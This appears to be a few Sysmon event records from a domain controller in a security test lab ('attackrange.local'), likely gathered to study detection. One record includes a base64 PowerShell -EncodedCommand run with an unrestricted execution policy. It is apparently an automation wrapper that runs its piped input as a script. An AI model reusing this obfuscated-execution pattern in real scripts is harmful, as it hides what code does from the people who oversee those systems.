{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":9277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.709\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-00105C361200}\r\nProcessId: 4708\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-13D2-5F25-0000-0020B61A1200}\r\nLogonId: 0x121AB6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nParentProcessId: 4692\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.709","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-00105C361200}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-13D2-5F25-0000-0020B61A1200}","LogonId":"0x121ab6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","ParentProcessId":"4692","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nSourceProcessId: 4692\r\nSourceThreadId: 4928\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00105C361200}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2b2ae14b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f225|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74eef6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2b20030b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a70fa8c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a76df5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a7515c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a7515c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a751451|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a7433d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f909|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f4fc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f225|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74eef6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2b20030b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a735d57|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a735327","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","SourceProcessId":"4692","SourceThreadId":"4928","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00105C361200}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2b2ae14b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f225|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74eef6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2b20030b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a70fa8c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a76df5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a7515c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a7515c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a751451|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a7433d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f909|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f4fc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74f225|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a74eef6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2b20030b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a735d57|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+2a735327","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00105C361200}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00105C361200}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
